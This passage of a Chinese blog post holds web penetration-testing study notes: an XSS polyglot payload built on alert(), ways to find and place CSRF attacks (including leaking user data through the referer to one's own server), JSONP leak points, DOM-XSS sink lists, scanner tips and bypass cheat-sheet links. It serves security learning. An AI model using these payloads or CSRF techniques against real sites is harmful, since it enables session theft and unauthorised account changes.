<span class="hljs-string">或其他能执行js的payload验证获取到主机名即可</span>



<span class="hljs-string">7xss一句话</span>

<span class="hljs-string">Plain</span> <span class="hljs-string">Text</span>
<span class="hljs-string">jaVasCript:/*-/*`/*\`/*'/*"/**/(/*</span> <span class="hljs-string">*/oNcliCk=alert()</span> <span class="hljs-string">)</span>
<span class="hljs-string">//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e</span>


﻿﻿



<span class="hljs-number">3.</span><span class="hljs-string">Csrf</span>
<span class="hljs-number">1</span><span class="hljs-string">.发现方式：观察应用是否有对用户发送的请求做验证，通常为检测referer或csrf_token,若未验证通过自己写html页面（b页面）并发送请求修改原网站（a页面）的某些用户信息，若访问b页面时请求发送成功并被响应，a网页信息修改成功，则证明此网站存在csrf漏洞，</span>



<span class="hljs-number">2</span><span class="hljs-string">.位置，通常可在评论，留言，私信等位置留下链接用户在访问时将可能受到攻击，出现较多的情况：</span>


<span class="hljs-number">1</span><span class="hljs-string">.发布信息的处，发布链接，或图片资源，用户在访问该链接时触发，影响范围为在访问该发布内容的用户</span>

<span class="hljs-number">2</span><span class="hljs-string">.评论，评论链接，图片资源，用户在访问该内容触发，影响范围为所有访问该内容的用户</span>

<span class="hljs-number">3</span><span class="hljs-string">.用户头像，或前面等位置的图片或链接，比较隐蔽</span>

<span class="hljs-number">4</span><span class="hljs-string">.图片类型可结合登录跳转携带用户敏感信息进行利用，通过referer将信息发送至自己服务器</span>
<span class="hljs-number">5.</span><span class="hljs-string">bbcode语法，某些富文本编辑框支持的语法，如[img]https://baidu.com[/img]</span>
﻿﻿

<span class="hljs-number">4.</span><span class="hljs-string">jsonp</span>
<span class="hljs-number">1</span><span class="hljs-string">.出现位置：</span>



<span class="hljs-string">网页发送的请求中</span>



<span class="hljs-string">常用参数：callback,</span> <span class="hljs-string">cb...</span>



<span class="hljs-string">漏洞情况：</span>

<span class="hljs-number">1</span><span class="hljs-string">.用户敏感信息泄露</span>
<span class="hljs-number">2.</span><span class="hljs-string">xss</span>
<span class="hljs-string">...</span>
﻿﻿

<span class="hljs-number">5</span><span class="hljs-string">.内容审计</span>
<span class="hljs-number">1.</span><span class="hljs-string">url与html属性</span>



 <span class="hljs-string">url参数，路径，html不同属性的作用...</span>



<span class="hljs-number">2.</span><span class="hljs-string">JS代码审计与隐藏参数</span>

<span class="hljs-string">审计常见危险方法名：</span>

<span class="hljs-string">Plain</span> <span class="hljs-string">Text</span>
<span class="hljs-string">innerHTML</span>
<span class="hljs-string">appendChild()</span>
<span class="hljs-string">html()</span>
<span class="hljs-string">replaceWith()</span>
<span class="hljs-string">location.hash</span>
<span class="hljs-string">location.search()</span>
<span class="hljs-string">localStorage</span>
<span class="hljs-string">setTimeout()</span>
<span class="hljs-string">eval()</span>
<span class="hljs-string">隐藏参数</span>

<span class="hljs-string">url中自动产生的参数</span>
<span class="hljs-string">input标签hidden属性</span>
<span class="hljs-string">js代码中的隐藏参数</span>
<span class="hljs-string">其他相关业务中使用到的参数</span>


<span class="hljs-string">隐藏路径：id，请求</span>

<span class="hljs-string">a标签的href，带注释的a标签</span>
<span class="hljs-string">form的action提交地址</span>
<span class="hljs-string">script标签内的路径</span>
<span class="hljs-string">path搜索，https://,</span> <span class="hljs-string">/</span>
<span class="hljs-string">请求地址，参数，响应值</span>
﻿﻿

<span class="hljs-number">6</span><span class="hljs-string">.工具的使用</span>
<span class="hljs-number">1.</span><span class="hljs-string">Awvs</span>
<span class="hljs-string">测试前主动扫描网站，分析报告，针对报告中有风险的位置多次尝试复现（若无法复现，此处可能为误报）</span>
<span class="hljs-number">2.</span><span class="hljs-string">Xray</span>
<span class="hljs-string">对具体位置，请求进行精准扫描，分析报告，尝试复现报告，（xss误报较少，sql注入误报较多）</span>
<span class="hljs-number">3.</span><span class="hljs-string">JSPrime</span>
<span class="hljs-string">对站点进行深度审计时可用于分析站点js代码执行顺序，审计domxss</span>
﻿﻿

<span class="hljs-number">7</span><span class="hljs-string">.学习提升</span>
<span class="hljs-number">1</span><span class="hljs-string">.多看漏洞案例及公开漏洞报告</span>
<span class="hljs-number">2</span><span class="hljs-string">.对漏洞可尝试进行复现，加深印象</span>
<span class="hljs-number">3</span><span class="hljs-string">.多注重思路的培养，寻去自己独特的测试流程</span>
<span class="hljs-number">4</span><span class="hljs-string">.多吸收国内外的漏洞文章经验及思路</span>
<span class="hljs-number">5</span><span class="hljs-string">.对通用漏洞或系统在遇见前先查询改系统的公开通用漏洞</span>
<span class="hljs-number">6</span><span class="hljs-string">.对好的知识点或内容进行收集整理</span>




<span class="hljs-string">http://www.58q8.com/web/hkdh/</span>   <span class="hljs-string">安全网站导航</span>

<span class="hljs-string">https://www.exploit-db.com/google-hacking-database</span>   <span class="hljs-string">Google</span> <span class="hljs-string">hack</span> <span class="hljs-string">资料库</span>

<span class="hljs-string">http://www.cnnvd.org.cn/</span>  <span class="hljs-string">安全信息库</span>

<span class="hljs-string">http://whatweb.bugscaner.com/look/</span>  <span class="hljs-string">cms查询</span>

<span class="hljs-string">http://tools.bugscaner.com/subdomain/</span> <span class="hljs-string">子域名</span>

<span class="hljs-string">https://site.ip138.com/myoas.com/domain.htm</span> <span class="hljs-string">ip</span>

<span class="hljs-string">https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet</span> <span class="hljs-string">xss</span> <span class="hljs-string">bypass</span>

<span class="hljs-string">http://kumamon.fun/MyBB-RCE/</span> <span class="hljs-string">bbcode嵌套</span>

<span class="hljs-string">https://www.freebuf.com/articles/web/81959.html</span> <span class="hljs-string">常见waf绕过</span>

<span class="hljs-string">https://html5sec.org/</span> <span class="hljs-string">h5security</span>

<span class="hljs-string">https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html</span></code></pre>


            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/xss/">xss</a>
                    
                      <a class="hover-with-bg" href="/tags/web/">web</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                      <a href="/2020/06/20/solidity/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">solidity</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/06/16/django-learn/">
                        <span class="hidden-mobile">django_learn</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: 'article.markdown-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "xss_train&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>




















</body>
</html>
